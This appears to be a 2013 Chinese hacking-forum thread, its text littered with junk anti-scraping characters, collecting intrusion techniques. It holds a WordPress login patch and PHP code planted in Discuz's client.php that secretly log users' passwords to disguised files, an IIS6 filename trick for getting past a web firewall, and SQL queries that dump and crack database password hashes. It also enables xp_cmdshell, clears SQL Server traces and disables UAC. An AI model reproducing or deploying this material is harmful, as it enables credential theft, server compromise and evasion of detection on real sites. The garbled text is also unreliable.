. K! j. }) s/ Z4 ^" i# I! _- O6 ]}
} r; e: i2 {当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
) A4 L0 f$ U( r. N就是搜索case ‘login’6 X6 l# o: l) R, e/ H0 r2 I
在它下面直接插入即可,记录的密码生成在pwd.txt中,4 Z5 ?8 k9 n, c, u4 [: V* d( J+ k' b
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录) G, x/ ]7 \5 f0 o* t
利用II6文件解析漏洞绕过安全狗代码:
' t$ O) K( y0 j- S; _;antian365.asp;antian365.jpg
4 z6 H- Y# D, ~4 G, R u7 c3 B8 X" R8 x1 b: v- L& F$ ~7 T
各种类型数据库抓HASH破解最高权限密码!2 {$ o+ x" L( |
1.sql server2000
/ r% E. @/ P4 p" c* pSELECT password from master.dbo.sysxlogins where name='sa'
# R/ t$ ^+ f% f# }% N1 ^0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
7 t; s. f4 _# h2 J6 X% h2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
" l+ e* ]+ u E, d& L
6 g$ }. ^- ?" u6 r [0×0100- constant header
6 g( ?$ W; `' _34767D5C- salt6 s/ o. t2 e; S; E! Q! i6 k
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
1 l7 T& X# T H. I' e m# f2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash' o. g7 s! |/ \: V/ f- L2 d; N A. k
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash- @* Z9 a! C) V' Z/ q1 d
SQL server 2005:-
( s9 u- t& F* _SELECT password_hash FROM sys.sql_logins where name='sa'4 P1 _5 o9 Q4 R
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
' r; e5 ]$ c! f; i- \. Q6 @) ?2 z0×0100- constant header5 R; D6 c _ H; O, b6 ]
993BF231-salt9 p+ B+ w R- F" _1 T# }) ?: E1 t5 k
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
6 [2 ^. q4 q' b$ Y0 {crack case sensitive hash in cain, try brute force and dictionary based attacks.3 o- V7 ^& F1 L1 f U
) u( m! c. t7 N7 y9 F
update:- following bernardo’s comments:-
+ M7 p5 b& X9 a0 j; tuse function fn_varbintohexstr() to cast password in a hex string.
2 ?# k8 C# g j* ^& t) C( [( f# be.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins" _# o' D( S2 {0 [7 U
; u1 K% U+ \. ~: R: U( c
MYSQL:-
+ }2 ~: H. S3 F- t) m/ o4 Z6 U- C
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
1 u6 y) G+ ` a! h1 o- p) [! p- ?
*mysql < 4.14 n, M8 M% C+ V; ?8 L, ~
& D9 f4 d) ]1 G' b+ m
mysql> SELECT PASSWORD(‘mypass’);, d F" S" v% G% Z/ v
+——————–+
( o+ c' b8 j% \/ }# H2 O* v| PASSWORD(‘mypass’) |
4 ]/ q" c" Y, N, f" O- O+——————–+4 d! h. s' W; S# \( [
| 6f8c114b58f2ce9e |
% c5 q6 q6 G0 }3 W3 E$ L+——————–+( k9 y# ^, a5 s
6 U4 B- q# j: j' c9 q, w
*mysql >=4.1
) O9 b( b5 y* X1 ^8 p' H, u7 K* j" Z6 Z( A+ E
mysql> SELECT PASSWORD(‘mypass’);
' e+ c7 Z' g+ @& ~7 ]/ M: f6 }+——————————————-+
/ c, J* D4 `" G# j5 t3 x+ w| PASSWORD(‘mypass’) |* I X- q& w6 h+ g( J$ O
+——————————————-+4 n+ [9 j% d0 n! C7 X" ^- b
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |7 ]2 b" S3 u2 B _* C$ M
+——————————————-+1 t7 O. j( w3 U. h" B( U% A x
- l9 Y( Y& J* f" f+ jSelect user, password from mysql.user
5 t( @7 y$ D/ ]- c1 g- mThe hashes can be cracked in ‘cain and abel’
0 I) `) w: W- [
1 k/ x/ @; S0 x" x7 t! _% nPostgres:-, X: J/ t% K3 i- c/ a% l
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)* f2 f; }' ?! x
select usename, passwd from pg_shadow;
+ r t# s- O, r8 K* ]8 F, h5 Husename | passwd
: D6 B3 U$ ~0 H/ Y- w——————+————————————-% M5 A0 `" {3 @( o9 [$ J: Z
testuser | md5fabb6d7172aadfda4753bf0507ed4396. I& n0 ]$ G5 j+ o# B& o7 f2 Z
use mdcrack to crack these hashes:-
0 L, k2 m6 e D$ X- y2 |$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396; N: d- r+ X, h8 e5 ?+ p6 s
6 e$ I5 `# T& u* A# o: C
Oracle:-
* ^" q; J4 q) ~) _" |" c( n3 vselect name, password, spare4 from sys.user$5 t) j s" Z' ?- \
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g4 s( O) o1 w6 X2 p, c, D- |
More on Oracle later, i am a bit bored….# `; Y& g" y( k( X$ N
) `, |% t1 H! U2 Q' n6 b- o
6 y' ]9 b6 i% r4 f4 I% X
在sql server2005/2008中开启xp_cmdshell( j7 r/ o9 M* f; B* ^0 G4 i8 Y
-- To allow advanced options to be changed.+ T) B) r+ e" Q
EXEC sp_configure 'show advanced options', 14 t' H; Y5 N# L' C9 U# U
GO- B X8 a# H1 m& C1 ~+ M6 j
-- To update the currently configured value for advanced options.4 ` }% i& w; z; |7 K' R( N
RECONFIGURE
6 g5 B7 Q- M5 o2 fGO
$ D3 a" o1 w7 A+ C-- To enable the feature.' z @( b& `8 [4 f& L& a$ _
EXEC sp_configure 'xp_cmdshell', 1: y/ v( b6 m" U( j9 j; Z1 g! L
GO; o K8 g! `8 z/ j @5 m
-- To update the currently configured value for this feature.4 V6 T8 I i5 e8 f: ~! L; s
RECONFIGURE- s8 F, Y( m$ h. M. C- V# ]
GO
& _3 P+ P: U$ A$ |SQL 2008 server日志清除,在清楚前一定要备份。0 a6 B( ] @0 q2 n/ d4 Q
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:2 E+ w5 q$ s, b1 w- ^7 f9 Q: s
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
+ f. s9 X" a; c [) S8 D
, ?# I# N0 U. A5 w9 p0 Z! [3 m对于SQL Server 2008以前的版本:
- V( n0 z( m6 @SQL Server 2005:2 J, L" s/ o/ m. ^! \. n( P6 r
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
9 C2 P$ Z# H4 b1 }. pSQL Server 2000:
: D5 z; j& d$ D, T" @清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。 r+ Y. [: ]: p2 n$ Q
& U2 r% Z) S3 I6 K& Z1 w
本帖最后由 simeon 于 2013-1-3 09:51 编辑
7 b+ j0 P7 L* K6 `( ~( q, K: N; A0 d7 x! ~6 k+ S
1 h7 S; D. W7 _% k. j% T
windows 2008 文件权限修改+ H! }, D8 n+ l g
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx" n0 y" W/ }* K2 y4 h" d
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad983 c% J7 C' j8 r1 r
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
5 s9 o( [3 |- l4 z/ E6 Q; k: s0 ^+ [" i, |
Windows Registry Editor Version 5.00
3 N+ v( I# |+ t) W- W[HKEY_CLASSES_ROOT\*\shell\runas]
- `8 X. p/ G$ S@="管理员取得所有权"0 X2 y# x( {4 g P d# ~ u" r
"NoWorkingDirectory"=""0 V+ c4 u2 `8 E9 L; `# |% b
[HKEY_CLASSES_ROOT\*\shell\runas\command]
* D# n/ W8 E6 z4 M$ \@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"- U$ v1 E1 H3 C# ?, S. h: o; C
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"6 _; c& F9 g$ e' S
[HKEY_CLASSES_ROOT\exefile\shell\runas2]3 i2 u9 v1 N4 U# Z: C3 q
@="管理员取得所有权"
/ T) n8 O0 ^6 ~3 E"NoWorkingDirectory"=""' B4 I) @6 C0 g2 m% B
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
% {/ N2 |5 ]$ }5 w+ ^@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"* Z9 m' t p+ I/ K5 a" w8 O% Z# a
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"- R5 J9 ~6 O. M( v1 O0 D; H
5 i/ Z) h1 k) I) p
[HKEY_CLASSES_ROOT\Directory\shell\runas]( Q' L. V9 o. ^5 z+ \
@="管理员取得所有权"
1 Q2 Z9 v3 V' S7 W& b, y"NoWorkingDirectory"=""+ M6 l# i: F5 u& n, m0 W2 M7 w0 U
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]5 A1 x7 a9 N+ ^3 Y- a( F/ d
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
4 R2 Z) ?, [1 X1 |3 g"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"2 r1 ]; t% z* n* H( p
& J! v, ?9 z" B/ r$ }) a1 i: V3 n* X% y& ~ P& d
win7右键“管理员取得所有权”.reg导入7 |, e1 S9 I8 r9 e1 h$ ~- @
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,3 {/ A! G1 ~8 O
1、C:\Windows这个路径的“notepad.exe”不需要替换" S- ? ^+ s1 f5 z# c
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换6 P7 C) o9 v! J8 c/ A* ^' n* V4 t
3、四个“notepad.exe.mui”不要管
7 n! B+ T; P* o; X% i4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
+ a0 Y2 q; v+ l4 vC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”4 a, B- q" H/ _
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,' s [0 `/ H. P
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
' t# `3 h7 h; H& _% u o. Hwindows 2008中关闭安全策略: - ?3 c x% ]' B! k7 I" A
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
. w& |4 C* S4 j3 e3 w$ X& V0 b修改uc_client目录下的client.php 在
: j5 X& k7 w" }) o, @: D3 A) [* afunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
8 K! G! j5 r8 z" i) l! X下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
, |! W; r' D3 o4 W0 Z你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw# A7 L) j9 G' A9 P1 ^; t, e; R
if(getenv('HTTP_CLIENT_IP')) {/ ~. z; H/ [1 J- g* n
$onlineip = getenv('HTTP_CLIENT_IP');
; ?, s; v( ]; k6 v) {& q# z$ R# x} elseif(getenv('HTTP_X_FORWARDED_FOR')) {# E7 n$ }6 `, h, n
$onlineip = getenv('HTTP_X_FORWARDED_FOR');: V! [& C6 [. ]
} elseif(getenv('REMOTE_ADDR')) {5 b& O* E6 x, A |1 h
$onlineip = getenv('REMOTE_ADDR');1 O' g, z8 a$ _1 Y
} else {! U0 A4 e% \! w6 a8 d/ H+ q1 S$ a
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];; M' q+ R2 L6 m' G- S: ~
}2 U. J$ U7 m& ^8 q
$showtime=date("Y-m-d H:i:s");6 w/ F& @1 r# J7 Y7 x- @9 Q
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
9 D. ^! U6 K- q5 t $handle=fopen('./data/cache/csslog.php','a+');! T3 C O3 D! ?0 S2 y9 x Y
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对